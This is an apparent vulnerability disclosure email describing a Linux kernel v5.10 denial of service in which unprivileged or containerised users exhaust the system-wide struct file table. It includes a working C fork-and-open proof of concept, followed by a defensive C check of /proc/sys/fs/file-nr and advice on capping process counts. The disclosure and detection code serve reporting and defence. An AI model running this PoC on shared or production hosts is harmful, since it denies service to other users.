Hi,

our team has found a problem in the fs system of Linux kernel v5.10, leading to DoS attacks.

The struct file can be exhausted by normal users by calling multiple syscalls such as timerfd_create/pipe/open etc. Although the rlimit limits the max fds that can be opened by a single process, a normal user can fork multiple processes, repeatedly make the timerfd_create/pipe/open syscalls and exhaust all struct files. As a result, all struct-file-allocation related operations of all other users will fail.

In fact, we tried this attack inside a deprivileged docker container without any capabilities. The processes in docker can exhaust all struct files on the host kernel. We use a machine with 16G memory. We start 2000 processes, each process with a 1024 limit. In total, around 1613400 struct files are consumed and there are no available struct files in the kernel. The total consumed memory is less than 2G, which is small, so the memory control group cannot help.

The following code shows a PoC that takes 1613400 struct files, taking all struct files on the host. We evaluated the PoC on an Intel i5 CPU physical machine + Linux kernel v5.10.0 + Ubuntu 18.04 LTS + Docker 18.06.0-ce.

-----------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
    for (int i = 1; i < 2000; i++) {
        int pid = fork();
        if (pid == 0) {
            /* Child: open files up to just under the per-process fd limit. */
            int fd;
            char nameout[20];
            for (int j = 1; j <= 1020; j++) {
                sprintf(nameout, "test%d%d.txt", i, j);
                /* O_CREAT requires an explicit mode argument. */
                fd = open(nameout, O_CREAT, 0644);
            }
            /* Block so the descriptors stay open. */
            getchar();
        }
    }
    getchar();
    return 0;
}
-----------------------------------------------

Looking forward to your reply!

Nanzi Yang
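
A defender-side check for the condition reported above, as an added example that is not part of the original message: it parses /proc/sys/fs/file-nr (allocated, unused, system-wide maximum) and tests whether one tenant's process count times its per-process fd limit can reach that maximum. The function names are hypothetical; 2000 and 1024 are the figures from the report.

```c
#include <stdio.h>

/* The three fields of /proc/sys/fs/file-nr. */
struct file_nr {
    unsigned long allocated;  /* struct file objects currently allocated */
    unsigned long unused;     /* allocated but free (0 on modern kernels) */
    unsigned long max;        /* system-wide ceiling, same as fs.file-max */
};

/* Parse one file-nr line; returns 0 on success, -1 on malformed input. */
int parse_file_nr(const char *line, struct file_nr *out)
{
    if (sscanf(line, "%lu %lu %lu", &out->allocated, &out->unused, &out->max) != 3)
        return -1;
    return out->max == 0 ? -1 : 0;
}

/* Percentage of the system-wide table in use (integer, rounded down). */
unsigned int file_table_pct(const struct file_nr *f)
{
    return (unsigned int)(((unsigned long long)f->allocated * 100) / f->max);
}

/* Worst case for one tenant: every process fills its RLIMIT_NOFILE.
 * Returns 1 if that alone can reach the system-wide ceiling. */
int tenant_can_exhaust(unsigned long max_procs, unsigned long nofile,
                       unsigned long file_max)
{
    return (unsigned long long)max_procs * nofile >= file_max;
}

int main(void)
{
    char line[128];
    struct file_nr f;
    FILE *fp = fopen("/proc/sys/fs/file-nr", "r");

    if (!fp || !fgets(line, sizeof line, fp) || parse_file_nr(line, &f) != 0) {
        perror("file-nr");
        return 1;
    }
    fclose(fp);
    printf("struct file usage: %lu/%lu (%u%%)\n", f.allocated, f.max, file_table_pct(&f));
    /* 2000 processes x 1024 fds are the figures from the report. */
    printf("2000 procs x 1024 fds can exhaust table: %s\n",
           tenant_can_exhaust(2000, 1024, f.max) ? "yes" : "no");
    return 0;
}
```

If the second line prints "yes", RLIMIT_NOFILE alone does not bound the tenant; the process count has to be capped as well (for example with RLIMIT_NPROC or the pids cgroup controller) so that the product stays below fs.file-max.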